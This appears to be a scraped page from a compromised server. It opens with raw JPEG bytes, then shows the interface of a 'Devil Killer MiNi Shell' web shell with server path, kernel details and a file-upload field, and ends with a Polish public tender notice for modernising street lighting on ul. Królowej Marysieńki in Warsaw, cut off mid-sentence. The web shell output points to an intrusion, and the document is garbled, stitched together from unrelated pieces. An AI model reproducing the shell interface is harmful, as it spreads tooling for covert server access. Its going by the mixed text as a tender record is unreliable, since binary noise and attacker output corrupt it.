JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230912/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230912/0039298901-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja oświetlenia ul. Królowej Marysieńki w Warszawie. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">MIASTO STOŁECZNE WARSZAWA</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Dzielnica Wilanów</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 015259640</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Franciszka Klimczaka 2</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Warszawa</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">02-797</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">mazowieckie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL911 - Miasto Warszawa</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">wilanow.zzp@um.warszawa.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wilanow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja oświetlenia ul. Królowej Marysieńki w Warszawie. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e39b5779-5161-11ee-9aa3-96d3b4440790</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00392989</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00030661/12/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.26 Przebudowa oświetlenia z wykonaniem doświetlenia przejść dla pieszych zlokalizowanych przy ul. Królowej Marysieńki.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://zamowienia.um.warszawa.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://zamowienia.um.warszawa.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Niezbędne wymagania<br/>sprzętowoaplikacyjne<br/>do przekazania danych dotyczące systemu<br/>https://zamowienia.um.warszawa.pl:<br/>• stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s na<br/>komputer;<br/>• komputer PC/MAC z aktualnym systemem operacyjnym wspieranym przez producenta;<br/>• zainstalowana przeglądarka wspierana przez producenta: MS Internet Explorer, Firefox, Google<br/>Chrome lub MS Edge;<br/>• włączona obsługa JavaScript;<br/>• zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf<br/>Format kodowania i oznaczania czasu:<br/>• plik załączony i zapisany przez Wykonawcę, widoczny jest w Systemie, jako zaszyfrowany – format<br/>kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu składania ofert;<br/>• oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu - zegarem<br/>Głównego Urzędu Miar.<br/>Wymagania sprzętowo-aplikacyjne w zakresie podpisywania ofert:<br/>W przypadku składania oferty w formie elektronicznej (podpisywania dokumentów kwalifikowanym<br/>podpisem elektronicznym), Wykonawca musi posiadać:<br/>• Kwalifikowany podpis elektroniczny osoby składającej ofertę w Systemie;<br/>• Włączona w przeglądarce obsługa JavaScript;<br/>• Zainstalowane na komputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows -<br/>w wersji 32 oraz 64 bitowej – do pobrania ze strony producenta w sekcji Java SE Runtime Environment<br/>8u202 - Windows x86 Offline oraz Windowsx64, dla systemu Mac - do pobrania ze strony producenta w<br/>sekcji Java SE Development Kit 8u202 - Mac OS X x64; alternatywnie do oprogramowania ORACLE -<br/>JAVA w wersji OpenJDK)<br/>• Zainstalowana aplikacja Szafir Host<br/>• Podłączony lub wbudowany w komputer czytnik kart podpisu elektronicznego. Prawidłowość<br/>zainstalowania w/w komponentów można zweryfikować po zalogowaniu do OnePlace, po kliknięciu<br/>przycisku „SPRAWDŹ PODPIS”.<br/>W przypadku składania oferty w postaci elektronicznej (podpisywania dokumentów podpisem<br/>osobistym), wykonawca musi posiadać:<br/>• E-dowód osobisty osoby składającej ofertę w Systemie;<br/>• Włączona w przeglądarce opcja obsługi JavaScript;<br/>• Zainstalowane na komputerze środowisko uruchomieniowe ORACLE JAVA (dla systemu Windows -<br/>w wersji 32 oraz 64 bitowej – do pobrania ze strony producenta w sekcji Java SE Runtime Environment<br/>8u202 - Windows x86 Offline oraz Windowsx64, dla systemu Mac - do pobrania ze strony producenta w<br/>sekcji Java SE Development Kit 8u202 - Mac OS X x64; alternatywnie do oprogramowania ORACLE -<br/>JAVA w wersji OpenJDK)<br/>• Zainstalowana aplikacja Szafir Host;<br/>• Zainstalowane oprogramowanie do obsługi e-dowodu E-dowód menadżer dostępne na stronie<br/>https://www.gov.pl/web/e-dowod;<br/>• Podłączony lub wbudowany w komputer czytnik karty e-dowód.<br/>Prawidłowość zainstalowania w/w komponentów można zweryfikować po zalogowaniu do OnePlace,<br/>po kliknięciu przycisku „SPRAWDŹ PODPIS”.<br/>W przypadku składania oferty w postaci elektronicznej (podpisywania dokumentów profilem zaufanym),<br/>wykonawca musi posiadać:<br/>• Profil zaufany osoby składającej ofertę w Systemie</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Określone w SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zamawiający informuje, iż: - Zamawiający udostępnia<br/>dane osobowe, o których mowa w art. 10 rozporządzenia Parlamentu Europejskiego i Rady (UE)<br/>2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE(ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z 04.05.2016, str. 1, ze zm. 3) ),zwanego dalej „rozporządzeniem 2016/679”, w celu umożliwienia korzystania ze środków<br/>ochrony prawnej, o których mowa w dziale IX ustawy z dnia 11 września 2019 r. Prawo zamówień<br/>publicznych, do upływu terminu do ich wniesienia.- Skorzystanie przez osobę, której dane osobowe<br/>dotyczą, z uprawnienia do sprostowania lub uzupełnienia danych osobowych, o którym mowa w art.<br/>16rozporządzenia 2016/679, nie może skutkować zmianą wyniku postępowania o udzielenie<br/>zamówienia publicznego ani zmianą postanowień umowy w sprawie zamówienia publicznego w<br/>zakresie niezgodnym z ustawą.- W postępowaniu o udzielenie zamówienia zgłoszenie żądania<br/>ograniczenia przetwarzania, o którym mowa w art. 18 ust. 1 rozporządzenia 2016/679, nie ogranicza przetwarzania danych osobowych do czasu zakończenia tego postępowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">39/WIR/2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 1081543,90 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> A.	Przedmiotem zamówienia jest modernizacja oświetlenia ul. Królowej Marysieńki w Warszawie. <br/>Zamówienie obejmuje wykonanie chodnika i zjazdów po stronie wschodniej ulicy Bruzdowej od ul. Zaściankowej do ul. Lercha.<br/>Klasyfikacja robót według wspólnego słownika zamówień:<br/>45316110-9 Instalowanie urządzeń oświetlenia drogowego.<br/>1.	CZĘŚĆ OPISOWA<br/>1.1.	Stan Istniejący<br/>Obecnie wciągu ulicy Królowej Marysieńki istnieje instalacja oświetlenia ulicznego wykonana na słupach betonowych typu WZ-6,5 z oprawami OUSd-150 oraz słupach stalowych typu SSO 60/60 wraz z oprawami SGS 101/70. W rejonie skrzyżowania ul. Królowej Marysieńki z ul. Lentza instalacja oświetleniowa została przebudowana i wykonana na słupach aluminiowych typu SAL-8 i SAL-6 z oprawami LUMA LED. Istniejące oświetlenie zasilone jest liniami kablowymi YAKY 4x35mm2 , YKY 5x16mm2 lub YKY 5x25mm2 z istn. szaf oświetleniowych: OS-782 zlokalizowanej przy skrzyżowaniu ul. Królowej Marysieńki z ul. Goplańską oraz OS-773 zlokalizowanej przy skrzyżowaniu ul. Królowej Marysieńki z ul. Łowcza. Istniejące oświetlenie jest wyeksploatowane bez możliwości wykorzystania w nowym rozwiązaniu.<br/>1.2.	Wielkość i zakres robót<br/>Zakres zamówienia obejmuje:<br/>	demontaż istniejących kabli oświetleniowych;<br/>	demontaż istniejących słupów oświetleniowych wraz z wysięgnikami i oprawami oświetleniowymi;<br/>	demontaż istniejącej szafy oświetleniowej OS-782<br/>	montaż projektowanej szafy oświetleniowej OS-782<br/>	zmianę lokalizacji i modernizację istniejącej szafy oświetleniowej OS-773<br/>	montaż projektowanych słupów oświetleniowych;<br/>	wymianę w istn. lokalizacjach słupów oświetleniowych ciągu pieszego<br/>	montaż projektowanych linii kablowych typu YKY 5x25 mm2, YKY 3x16 mm2 oraz YKY 5x16 mm2 ułożonych na całej długości w rurach osłonowych;<br/>	montaż kabli zasilających szafy oświetleniowe – WLZ YKY 4x35 mm2.<br/>	wykonanie robót rozbiórkowych nawierzchni chodników wraz z przywróceniem terenu po robotach do stanu pierwotnego (uwzględniając pełnowartościowe materiały drogowe);<br/>	zagospodarowanie materiałów z demontażu do utylizacji;<br/>	wykonanie prac kontrolno-pomiarowych;<br/>	przygotowanie dokumentacji powykonawczej wraz przekazaniem instalacji w eksploatację i zarząd do Zarządu Dróg Miejskich;<br/>	wykonanie innych czynności nie ujętych w dokumentacji projektowej lub dokumentach kontraktowych a niezbędnych i koniecznych do realizacji, zakończenia robót, przekazania i odbioru instalacji przez Zamawiającego oraz Zarząd Dróg Miejskich w Warszawie;<br/>1.2.1 Lokalizacja <br/>Ulica Królowej Marysieńki w Dzielnicy Wilanów wraz z fragmentem ul. Kosiarzy na odc. od ul. Wiktorii<br/>1.2.2	Wymagania Techniczne projektowanego oświetlenia:<br/>Należy stosować słupy oświetleniowe aluminiowe anodowane, u podstawy zabezpieczone warstwą elastomeru do wysokości wnęki kablowej. Słupy o przekroju okrągłym i grubości ścianki min. 4 mm lub aluminiowych anodowanych zabezpieczonych fabrycznie warstwą elastomeru na prefabrykowanych fundamentach betonowych. Wysokość zestawu słup + wysięgnik powinna wynosić dla doświetleń przejść dla pieszych h=6m zaś dla oświetlenia ulicznego h=8m. Dokładne rozmieszczenie słupów i parametry instalacyjne opraw zostały podane w dokumentacji projektowej tj. Projekcie Wykonawczym modernizacji oświetlenia ul. Królowej Marysieńki w Warszawie. Szczegółowy zakres prac budowlano montażowych określa Projekt Wykonawczy modernizacji oświetlenia ul. Królowej Marysieńki w Warszawie. <br/>Przedmiot zamówienia należy zaprojektować i wykonać zgodnie z obowiązującymi przepisami, warunkami wydanymi przez zarządcę drogi, warunkami technicznymi przyłączenia urządzeń elektroenergetycznych do sieci oświetleniowej, oraz niniejszym programem funkcjonalno-użytkowym stanowiącym załącznik do SIWZ.<br/>Uwaga: Kolorystyka i kształt słupów oraz opraw oświetleniowych zgodna z opinią Wydziału Kształtowania Przestrzeni Publicznej Biura Architektury i Planowania Przestrzennego m.st. Warszawy.<br/>1.3 Aktualne uwarunkowania wykonania przedmiotu zamówienia<br/>Rozpoczęcie robót należy poprzedzić protokólarnym przekazaniem terenu na podstawie opracowanej czasowej organizacji ruchu oraz koordynować z Wydziałem Organizacji Ruchu pod względem ewentualnego przewieszenia istniejącego oznakowania <br/>Roboty budowlane mają być wykonywane zgodnie z:<br/>- przekazaną dokumentacją projektową;<br/>- wymaganiami stawianymi urządzeniom oświetleniowym i doświetleniu przejść dla pieszych opisanych w specyfikacjach znak: STO_ZDM_TOS_1 oraz STO_ZDM_TOS_2 (dostępnych na stronie na stronie internetowej Zarządu Dróg Miejskich pod adresem: https://zdm.waw.pl/sprawy/wydawanie-opinii/<br/>- wytycznymi ujętymi w umowie oraz dokumentach stanowiących jej integralną część,<br/>- dokumentacją projektową uzgodnioną przez Zamawiającego,<br/>- aktualnie obowiązującą wersją Prawa Budowlanego <br/> - innymi obowiązującymi przepisami prawa i normami.<br/>1.4. Przygotowanie terenu prac, prowadzenie prac<br/>Warunki wykonania i odbioru robót budowlanych powinny być zgodne z zawartością odpowiednich specyfikacji technicznych.<br/>Roboty należy wykonać na podstawie opracowanej i zatwierdzonej przez Zamawiającego dokumentacji technicznej, zgodnie ze sztuką i wiedzą budowlaną. <br/>Realizacja robót w oparciu o zatwierdzone przez Zamawiającego projekty wykonawcze po wytyczeniu robót przez uprawnionego geodetę. <br/>Przekazanie zrealizowanych robót Zamawiającemu. <br/>Sporządzenie inwentaryzacji geodezyjnej powykonawczej.<br/>Sporządzenie dokumentacji powykonawczej.<br/>Realizacja powyższego zakresu winna być wykonana w oparciu o obowiązujące przepisy, <br/>w szczególności ustawy Prawo budowlane wraz z przepisami wykonawczymi, przez Wykonawcę posiadającego stosowne doświadczenie i potencjał wykonawczy określony w SIWZ oraz przez osoby posiadające odpowiednie kwalifikacje i doświadczenie.<br/>Wykonanie i oddanie do użytku musi być również zgodne z wszystkimi aktami prawnymi właściwymi dla przedmiotu zamówienia, z przepisami techniczno - budowlanymi obowiązującymi polskimi normami, wytycznymi oraz zasadami wiedzy technicznej. <br/>Wykonawca zrealizuje czynności niezbędne do przekazania inwestycji gestorowi uzbrojenia tj. Zarządowi Dróg Miejskich w Warszawie ul. Chmielna 120. i zajęcia pasa drogowego. <br/>Koszty związane z odbiorem technicznym pokryje Wykonawca.<br/>Wykonawca zapewni organizację ruchu na okres budowy zgodnie z wykonanym projektem.<br/>Wykonawca musi liczyć się z sytuacją, że rodzaje i ilości robót określone w niniejszym opracowaniu mogą ulec zmianie po opracowaniu dokumentacji projektowej.<br/>Doświetlenie należy wykonać w możliwie krótkim czasie zachowując środki ostrożności, szczególnie uważając by nie uszkodzić istniejącej infrastruktury technicznej<br/>1.5 Dokumentacja Powykonawcza<br/>Wykonawca zobowiązany jest do sporządzenia dokumentacji powykonawczej zawierającej następujące elementy:<br/>a)	wykaz przekazanej dokumentacji (spis),<br/>b)	szczegółowy opis wykonanych prac z podziałem na poszczególne elementy, podaniem dokładnej nazwy i producenta użytych materiałów oraz opisem zastosowanej technologii,<br/>c)	dokumentacje projektową wraz pozwoleniami uzgodnieniami, zmianami naniesionymi kolorem czerwonym,<br/>d)	dziennik budowy/robót,<br/>e)	dokumentację utylizacji materiałów,<br/>f)	pisemne oświadczenie Wykonawcy (Kierownika Budowy / Robót) o zakończeniu budowy / robót oraz o prawidłowości ich wykonania,<br/>g)	oświadczenie Kierownika Budowy / Robót o uporządkowaniu terenu na którym prowadzono prace jak i terenów przyległych,<br/>h)	protokoły pomiarów elektrycznych;<br/>i)	projekt czasowej organizacji ruchu,<br/>j)	wszelkie inne uzgodnienia wymagane odrębnymi przepisami.<br/>k)	deklaracje zgodności na wbudowane materiały,<br/>l)	protokoły przekazania terenu,<br/>m)	niezbędne protokoły branżowe (np. protokół ZDM, Wydział Ochrony Środowiska, gestorzy sieci)<br/><br/>2. CZĘŚĆ INFORMACYJNA<br/>Wykonanie przedmiotu zamówienia musi być zgodne z wymogami przepisów następujących aktów prawnych:<br/>a.	ustawa Prawa budowlanego z dnia 7 lipca 1994 r. (Dz. U. Nr 89, poz. 414 z późniejszymi zmianami),<br/>b.	ustawa Prawo zamówień publicznych, <br/>c.	ustawa o wyrobach budowlanych z dnia 16 kwietnia 2004 r. (Dz.U. 2014 nr 92 poz. 881),<br/>d.	rozporządzenie Ministra Infrastruktury z dnia 2 września 2004 r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robot budowlanych oraz programu funkcjonalno-użytkowego. (Dz. U. Nr 202/2004, poz. 2072),<br/>e.	rozporządzenie Ministra Infrastruktury z dnia 1 sierpnia 2019 r. zmieniające rozporządzenie w sprawie warunków technicznych, jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz.U. 2019 poz. 1643).<br/>Posiadane dokumenty niezbędne do wykonania omawianych prac<br/>- Projekt wykonawczy modernizacji oświetlenia ul. Królowej Marysieńki<br/>- Specyfikacje Techniczne Odbioru i Wykonania Robót <br/>- Protokół z Narady Koordynacyjnej wraz z załącznikami mapowymi;<br/>- Komplet uzgodnień branżowych; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45316110-9 - Instalowanie urządzeń oświetlenia drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">150 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Określony w SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> jakość, w tym do parametry techniczne, właściwości estetyczne i funkcjonalne takie jak dostępność dla osób niepełnosprawnych lub uwzględnianie potrzeb użytkowników <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Rozszerzony okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1.	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej.<br/>1.1	W zakresie doświadczenia Wykonawcy <br/>Na potwierdzenie spełnienia warunku udziału Wykonawca wykaże, że w okresie ostatnich pięciu lat przed upływem terminu składania ofert (a jeżeli okres prowadzenia jest krótszy – w tym okresie), wykonał w sposób należyty jedną robotę budowlaną o wartości wynoszącej co najmniej 800.000,00 zł brutto, polegającą na remoncie, budowie lub rozbudowie oświetlenia ulicznego. <br/>1.2	W zakresie kwalifikacji osób skierowanych do realizacji zamówienia<br/>O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy wykażą, iż w trakcie realizacji zamówienia dysponować będą, na potrzeby prawidłowej 